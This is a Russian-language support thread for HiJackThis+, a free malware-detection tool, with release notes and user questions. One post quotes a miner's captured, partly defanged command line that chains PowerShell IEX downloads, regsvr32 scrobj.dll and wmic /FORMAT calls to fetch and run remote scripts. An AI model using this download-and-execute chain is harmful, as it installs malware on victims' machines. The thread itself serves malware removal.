HiJackThis+ (Plus)

HiJackThis+ (Plus) 3.4.0.8

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
7,813
Реакции
6,592
  • Первое сообщение
  • #1
HiJackThis+
(ex. HiJackThis Fork v3)


Ссылки для скачивания (Download Links):

Test (beta) | Stable | Source Code

В этой теме обсуждается программа HiJackThis и её модификация (форк) от команды SafeZone, используемый внутри Автологгера и именуемый HiJackThis+.
Здесь Вы можете:
  • задать вопросы разработчикам
  • оставить отзывы и пожелания по улучшению программы
  • сообщить об ошибке в программе
Краткое описание программы:
HiJackThis - это инструмент, который способен обнаружить и исправить изменения в наиболее уязвимых местах операционной системы, сделанные рекламными, шпионскими, вредоносными и другими нежелательными программами.

Проверка через HiJackThis основана не на чёрных списках, конкретных программах или URL-адресах, а только на методах, используемых вредоносным и рекламным ПО ("угонщиками браузеров"). Поэтому программа не требует постоянных обновлений.

Как минус, в её результатах отображаются и легитимные, и вредоносные объекты.
Поэтому нельзя удалять всё подряд. Это вполне гарантированно нанесёт вред системе.
Оценку вредоносности объектов в отчёте должен проводить специалист по информационной безопасности.

Если Вы желаете пройти курс обучения работе в HiJackThis, то можете подать заявку на участие в Программе обучения по "лечению" персонального компьютера

Авторские права:
HiJackThis+ (Plus) является модификацией (форком) программы Trend Micro HijackThis, подготовленным Alex Dragokas и командой SafeZone.cc, и распространяется вместе с открытым исходным кодом и соблюдением оригинальной лицензии GNU GPLv2.

С исходным кодом можно ознакомиться в репозитории GitHub.

Как сообщить об ошибке в программе?
Если появилось окно с ошибкой, то в буфере обмена содержится её текст.
Он нужен разработчикам, чтобы улучшить программу.

Пожалуйста, вставьте правой кнопкой мыши в эту тему текст.
Если его нет:
1) приложите скриншот ошибки.
2) укажите версию программы HijackThis (см. заголовок окна)
3) укажите разрядность и версию Windows
4) (необязательно) ссылку на тему, где производится лечение Вашего ПК

Спасибо. Команда разработчиков HJT+.

Программа зависла / отработала не до конца / завершилась с ошибкой / "упала". Что делать?
Соберите и пришлите архив аварийного дампа с отладочными логами. Подробнее: см. в разделе FAQ.

Руководство к TrendMicro HiJackThis v.2 от regist
Дополнение к руководству HiJackThis+ от Dragokas
 
Последнее редактирование:
Если подсистему WMI не вырезали из системы, то осуществляет. HJT работает не через wmic.exe, а напрямую.
 
Спасибо за ответ.

Есть майнер, запуск которого ловит Защитник, но ни в одних логах нет связанных с ним привычных записей WMI. Маскироваться записи могут?
 
Могут. Пришлите семпл, потом можно будет о чем-то говорить. Через карантин дефендера ведь можно найти тушку и потом оттрейсить из UVs до источника.
 
Защитник ловит только запуск (во избежание детекта на форум заменил часть латиницы кириллицей)

CmdLine: C:\Windows\System32\cmd.exe /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8080/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185_26_113_95:8221/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8096/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8204/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi22.hа7455h6fi1.net:8080/рower.txt')||regsvr32 /u /s /i:h__p://hа7455h6fi1.net:8080/s22.tхt scrobj.dll&wmic os get /FORMAT:"h__p://wmi2.hа7455h6fi1.net:8220/s2.хsl
 
Последнее редактирование:
Фильтр без Consumer бесполезен.
HJT не отображает "хвосты" от WMI. Уже несколько раз объяснял.
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.19] - 24.07.2022
- Обновлён белый список служб.
- Некоторые корректировки в O4, чтобы охватывать большее число случаев при отображении постфикса "(Microsoft)".
- O22 - Tasks_Migrated: добавлено определение мигрированных заданий.
- O22 - Tasks: добавлено определение заданий в SysWow64.
- O22 - Tasks: исправлено неверное декодирование не-англоязычных символов xml парсером.

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.20] - 02.08.2022
- Выполнено несколько исправлений AppLocker (спасибо regist за отчёты, аналитику и поддержку):
- O7 - AppLocker: добавлено определение правила "ManagedInstaller".
- O7 - AppLocker: исправлено hash правило, которое отображалось в виде одной записи, вместо нескольких.
- O7 - Applocker: улучшена процедура "Fix all".

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.21] - 28.08.2022
- Добавлены сведения о свободной физической памяти и общей нагрузке на центральный процессор*.
* На слабых процессорах данные о нагрузке могут быть завышены.
- Урезаны метаданные иконок, которые обнаруживались правилами Sigma.
- Исправлены шаблон Hosts и его ACL права до эталонных.
- O22 - добавлены префиксы -32 для 32-битных заданий в 64-битной ОС.
- Инструменты=>Разблокировать файл/папку: Улучшена рекурсивная процедура сброса прав.

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.23] - 03.09.2022
- Контекстное меню: добавлена кнопка "Копировать" - "Аргумент файла".
- Поиск: сохранение последней искомой фразы после закрытия программы.
- Сканер ADS: исправлена работа кнопки "Обзор" (спасибо Alexyz21 за извещение).
- Менеджер деинсталляции программ: исправлено расположение кнопки "Удаление программ".
- Инструмент проверки ЭЦП: Новые кнопки "Добавить папку" и "Очистить список".
- Поправлены переводы.

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.25] - 14.01.2023
- Исправлено зависание при исправлении O7 - TroubleShooting: (EV).
- Обновлены белые списки Windows 11.
- Добавлено определение политик Windows Defender и восстановление провайдеров AMSI.

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновления

[2.10.0.29] - 14.04.2023
- Добавлен O7 - AutoLogon.
- O7 - TroubleShooting (EV): для [PathExt] и [PSModulePath] изменён метод проверки на "Missing list", т.е. элемент выводится только, если не хватает системной записи по умолчанию.
- Исправлено переполнение в классе таймера (спасибо Mikle Quits).
- Исправлен пункт "Найти в Google".
- Некоторые оптимизации скорости.

[2.10.0.28] - 02.03.2023
- Исправлен баг с прогресс-баром (спасибо @Yashil06 за извещение).

[2.10.0.26] - 13.02.2023
-...

Узнать больше об этом обновлении...
 

Debug information:

Warning! The integrity of this HiJackThis instance is corrupted.
Perhaps the file has been patched or infected by a virus.
It is recommended to download the program again from official source: GitHub - dragokas/hijackthis: A free utility that finds malware, adware and other security threats
If this error repeats, check your PC using a boot disk or LiveCD, e.g.: Как записать образ Kaspersky Rescue Disk 18 or Dr.Web — Аптечка сисадмина. Бесплатные утилиты, утилита удаления Dr.Web
 

Вложения

  • CollectionLog-2023.04.15-13.07.zip
    35.1 KB · Просмотры: 4
Последнее редактирование:
@thyrex,
Не прошел проверку по ЭЦП, как и ещё 2 файла службы.
Система старая, возможно не хватает некоторых корневых сертификатов.
Понятней будет только, если вручную зайти в свойства файла HiJackThis - вкладка "Цифровая подпись" - "Сведения", наверху будет объяснение причины.
На будущее наверное сделаю вывод описания ошибки проверки.
А заходя наперед, в планах добавить возможность устанавливать сертификаты из интерфейса хиджака.
А также делать доп. проверку корневого серта служб по своей базе, если в системе нужный серт отсутствует.
 
По поводу , логи - т.е , Symantec - всегда выдает ложное детект , поскольку она так всегда агрессивен к недоверию файла.
С, старым системой -проверить систему на XP , бесполезен - пустая трата на разработку. Т.е , система уже не в актуальном состоянии - а поддержка прекращен.
По моему личное мнение - недостаточная квалификация у самого пользователя , пусть администратор обновит свежую систему до актуальную состояние - где дырка исправлен в M$ , на новом билде.
 
Последнее редактирование:
@wumbo12, я себя нормально чувствую более 5 лет на Windows 7. И уже как минимум 3 раза себя плохо чувствовал на Windows 10, 11, доводя систему до незагружаемого состояния за полгода. Так что нет, мне бы к примеру не хотелось обновлять до "актуального состояния".
По сути инструмент, который я делаю, будет единственным в своём роде, позволяющим добавить сертификаты и дать возможность запустится некоторым особо требовательным к проверкам инсталляторам.
HiJackThis поддерживает не только XP, но и Windows 2000. А политика Microsoft пусть идёт лесом. Им лишь бы бабла срубить и всех на Win 11 пересадить.
 
@wumbo12, я себя нормально чувствую более 5 лет на Windows 7. И уже как минимум 3 раза себя плохо чувствовал на Windows 10, 11, доводя систему до незагружаемого состояния за полгода. Так что нет, мне бы к примеру не хотелось обновлять до "актуального состояния".
По сути инструмент, который я делаю, будет единственным в своём роде, позволяющим добавить сертификаты и дать возможность запустится некоторым особо требовательным к проверкам инсталляторам.
HiJackThis поддерживает не только XP, но и Windows 2000. А политика Microsoft пусть идёт лесом. Им лишь бы бабла срубить и всех на Win 11 пересадить.
Поддерживаю , виноват конечно же Microsoft , ведь Microsoft -делает только "Фигушки" за жадность, нет свободное , как говорится Open Source , GPL 3.0 вроде как .
 
Назад
Сверху Снизу